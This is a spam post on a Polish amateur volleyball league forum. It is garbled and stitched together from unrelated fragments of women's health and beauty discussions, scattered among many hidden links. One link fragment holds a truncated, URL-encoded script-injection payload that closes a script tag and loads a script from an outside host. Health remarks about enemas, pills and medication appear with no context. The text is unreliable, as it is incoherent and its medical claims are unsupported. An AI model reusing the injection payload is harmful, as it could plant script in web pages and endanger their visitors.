Forum www.ligapwz.fora.pl Strona G│ˇwna www.ligapwz.fora.pl
Liga siatkowki PWZ
 
 FAQFAQ   SzukajSzukaj   U┐ytkownicyU┐ytkownicy   GrupyGrupy   GalerieGalerie   RejestracjaRejestracja 
 ProfilProfil   Zaloguj siŕ, by sprawdziŠ wiadomoÂciZaloguj siŕ, by sprawdziŠ wiadomoÂci   ZalogujZaloguj 

dzis na zdrowiu i uroda byl temat:

 
Napisz nowy temat   Odpowiedz do tematu    Forum www.ligapwz.fora.pl Strona G│ˇwna -> Amatorska Liga Siatkˇwki PWZ
Zobacz poprzedni temat :: Zobacz nastŕpny temat  
Autor WiadomoŠ
Juukla




Do│▒czy│: 25 Sty 2014
Posty: 767
Przeczyta│: 0 tematˇw

Ostrze┐e˝: 0/5
Sk▒d: Finland

PostWys│any: Wto 21:46, 08 Kwi 2014    Temat postu: dzis na zdrowiu i uroda byl temat:

Stellla , dzi─Öi za szybk─ů odp
[link widoczny dla zalogowanych]
igm 7.2
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
20-25 ng/ml
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych] l dziekuje
[link widoczny dla zalogowanych]
Chamu, je┼Ťli masz wytrysk tak pot─Ö┼╝ny biore Cie w ciemno(( ))
[link widoczny dla zalogowanych]

W mlodosci tez nie bylo lepiej, wiec niestety, ale rysy twarzy to podstawa. [link widoczny dla zalogowanych] masz typowe objawy rwy barkowej
Ja mam ┼Ťlub za 2 miesi─ůce i te┼╝ rozwa┼╝am, czy zaufa─ç swojemu do┼Ťwiadczeniu w wykonaniu makija┼╝u. Ale nie chce nikogo martwi─ç. Czystego jelita miec nie moge bo mecza mnie straszne gazy;/ a teraz po prawie dw├│ch tygodniach od lewatywy mam problemy z wypr├│┼╝nianiem;/ wczesniej co dzien rano misie udawalo a teraz czasem mam problemy i musze sie bardziej wysilac heheh zastanawiam sie czy zrobic jeszcze raz. to naprawd─Ö pomaga polecam ANGIELSKI ZNAM NIEZLE, MOJ FACET GORZEJ [link widoczny dla zalogowanych]
Ja do g┼éod├│wki nie podchodzi┼éam jedynie w aspekcie odchudzania Widzia┼éam, ┼╝e bardzo chwali┼éy┼Ťcie ci─Öcia p Moniki - i w┼éa┼Ťnie do niej chcia┼éabym si─Ö zapisa─ç. Nie jedz owoc├│w! Diabe┼é wszystkich ludzi kusi, a najbardziej Ksi─Ö┼╝y i Zakonnice ................... no niestety ja tez duzo ponad 100 ..... A nawi─ůzuj─ůc do ┼Üwiatowego Dnia Mlodzie┼╝y, ja tu kiedy┼Ť w tygodniu szykuj─Ö si─Ö na wieczorn─ů Msz─Ö dla m┼éodzie┼╝y i nagle m├│j brat pyta dok─ůd lecisz..... a tak po za tym to nich ten topik nie zginie i moze znajdzie sie ktos kto zna jakis sposob
nikt nie poiwedzia┼é,┼╝e jak schudniesz do 48 kg to Twoje uda zeszczuplej─ů.lepiej jest ─çwiczy─ç.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
czesc
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

napisz prosz─Ö co i jak z tym usuwaniem blizny i tatua┼╝u, podaj─Ö maila gdyby┼Ť wola┼éa rozmawia─ç w 4 oczy.
[link widoczny dla zalogowanych]
med. powiem tylko jedno,nie otwierajcie ┼╝abek!!!!!!
u mnie było tak samo kłamstwo goniło kłamstwo oszczerstwo oszczerstwo.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

No zapewne mia┼éas jakiego┼Ť nieproszonego go┼Ťcia i jak mniemam powsta┼é u Ciebie w wyniku stosowania hormonalnych ┼Ťrodk├│w antykoncepcyjnych... [link widoczny dla zalogowanych] No wlasnie...pospieszylam sie Ja pisalam o podrozy za ocean.
Napisa┼éam Ci maila! mo┼╝e pomara┼äcz lub z┼éoto fajnie odbija niebieski kolor oka oraz pasuje do zieleni.......tak┼╝e be┼╝e, br─ůzy....mozna pokombinowa─ç pomiesza─ç i wychodzi zawsze cos ciekawego 3) wymiotowanie - jak czytalam tu o tym to szczerze sie balam ! pono─ç pobudzaj─ů estrogen do dzia┼éania i piersi powinny si─Ö troch─Ö powi─Ökszy─ç. ae jezeli mowiice ze ma okropna figure i poproawiana jest komputerowo i to bardzo to obejrzyjcie to. [link widoczny dla zalogowanych]
strasznie mnie to zaintrygowa┼éo . Jesienna mamo... W─Öglowodany=cukry oczywi┼Ťcie. Trzeci dzie┼ä na nim ─çwicz─Ö i jestem bardzo zadowolona. no wlasnie jak to jest? Witam w kolejny dzie┼ä... Dziekuje za rade o nie wyciaganiu skrzepow bo juz go mialam wyciagac.
nagle mamie zrobiło się bardzo niedobrze.
[link widoczny dla zalogowanych]
brzoskwinka napisz tu ja kupiłam od niej L
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

[link widoczny dla zalogowanych] cout.com&q=%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E% 3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2
[link widoczny dla zalogowanych]
Na prawd─Ö zrobili mi super fryzurk─Ö, lekka i zwiewna a zarazem inna niz dotychczas. M├│wicie tak bo zazdro┼Ťcicie jej partnera boskiego Kiszki
Jak mówił kardynał Wyszyński:
Mo┼╝esz wypr├│bowa─ç
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

W ogrodku jest ich mnostwo dlatego kiedy jest ladna pogodA nie moge wyjsc sobie na ogrod i posiedziec na trawce bo otaczaja mnie pajaki. [link widoczny dla zalogowanych] !!wracaj do nas szybciutko ciesz─Ö si─Ö ogromnie napisz meila wy┼Ťle ci nasze hasli na poczt─Ö nk ju┼╝ nie mam j─ů jak zwykle si─Ö wlocze ale jak dojade do domu to si─Ö odezw─Ö no nqtka ju┼╝ w takim wieku a┼╝ si─Ö boj─Ö a pami─Ötam jak mia┼éa bzika na punkcie harrego pottera karolka i r├│┼╝a pewnie si─Ö du┼╝o zmienily p├│┼║niej zajze
-------------------------------------------------------- ------------------------------- a one(cycki) do mnie wogole nie pasuja waze 53 kg nosze spodnie rozm 36 a bluski musze kupowac 38 lub wieksze jestem do tego niska Mo┼╝na dawa─ç na ┼éosy codziennie, najlepiej na noc. Trzymam kciuki za Ciebie... Wydaje mi si─Ö ┼╝e dzia┼éa, ale mo┼╝e to by─ç te┼╝ efekt zmniejszenia ilo┼Ťci pokarm├│w. [link widoczny dla zalogowanych]
Wszystko wydaje sie okai, super a potem wielka ch*jnia Wlasciwie to wszytko zrobilam.... Jestem w trakcie szukania. poch┼éania on pot i ┼éagodzi jego wo┼ä. Tak sobie my┼Ťla┼éam ze nie moge zgrzeszy─ç bo co bym tu napisa┼éa ... Dla rozwoju ukladu nerwowego i oczu, wiadomo... To proste.
[link widoczny dla zalogowanych]
Jak rozpozna─ç czy wystarczaj─ůco g┼é─Öboko w┼éo┼╝y┼éam t─ů tabletk─Ö?
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
ups
[link widoczny dla zalogowanych]

jak mu kiedys przy calowaniu (bo na szczescie z tym nie ma juz problemow) wlozylam reke pod koszulke na plecach to sie odsunol i zrobil caly czerwony.
[link widoczny dla zalogowanych]
I bra─ç rutinoscorbin albo cerutin na uszczelnianie naczy┼ä krwiono┼Ťnych. skoro nabijasz sie z innych to nie dziw sie ze nikt tu nic nie pisze
i je┼║dz─Ö na rowerze treningowym ok.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
Godzin─Ö temu polknelam dwie tabletki SUMAMED i teraz wlozylam GYNALGIN.
[link widoczny dla zalogowanych]
a tu co taka cisza ???
[link widoczny dla zalogowanych]

Pozdrawiam Was Dziewcz─ůtka. [link widoczny dla zalogowanych] o tym filmie nie mowi sie w kategoriach super (ewentualnie super-produkcja )
Mieszkali w Manitobie, czy ktos mo┼╝e ma kontakt do jakiegos \czerwonego krzyza\ lub cos w tym stylu w kanadzie? Ja mialam planowna cesarke.Zero stresu, luzik.Przyjechalismy do szpitala o 7.30 takjak bylo umowione...o 9 mialam┬┤byc cieta,gdy nagle sie okazalo ze dwie cesarki muszarobic nie planowne Dubois, jednak rozwa┼╝─Ö tak┼╝e mo┼╝liwo┼Ťc dojazdu do domu dziecka- posiadam samoch├│d i prawo jazdy). To m├│j pierwszy wyjazd za granic─Ö z Polski i tym samym pierwsza wizyta w tym mie┼Ťcie. a moze masz taki typ budowy ? [link widoczny dla zalogowanych]
ja to odkrylam jak mialam z 11 lat (to byl w ogole moj pierwszy raz). Podobno jest lepszy ni┼╝ bromergon. Nie wiem po co si─Ö powtarza─ç. To i ja odgrzej─Ö kotleta. Osobi┼Ťcie troch─Ö wypad┼éam ju┼╝ z tematu, teraz s─ů r├│┼╝ne nowe typy laser├│w, niekt├│re - jak s┼éyszalam - dzia┼éaj─ů na hemoglobin─Ö, wi─Öc r├│wnie┼╝ jasne w┼éosy kasuj─ů. No c├│┼╝ mog─Ö powiedzie─ç po tych dw├│ch tygodniach ─çwicze┼ä.... Cena promocyjna 119 za kompet!
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
- chc─ů sp┼éyci─ç blizny potr─ůdzikowe
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]


Post zosta│ pochwalony 0 razy
Powrˇt do gˇry
Zobacz profil autora
WyÂwietl posty z ostatnich:   
Napisz nowy temat   Odpowiedz do tematu    Forum www.ligapwz.fora.pl Strona G│ˇwna -> Amatorska Liga Siatkˇwki PWZ Wszystkie czasy w strefie EET (Europa)
Strona 1 z 1

 
Skocz do:  
Nie mo┐esz pisaŠ nowych tematˇw
Nie mo┐esz odpowiadaŠ w tematach
Nie mo┐esz zmieniaŠ swoich postˇw
Nie mo┐esz usuwaŠ swoich postˇw
Nie mo┐esz g│osowaŠ w ankietach

fora.pl - za│ˇ┐ w│asne forum dyskusyjne za darmo
Powered by phpBB © 2001, 2005 phpBB Group
Regulamin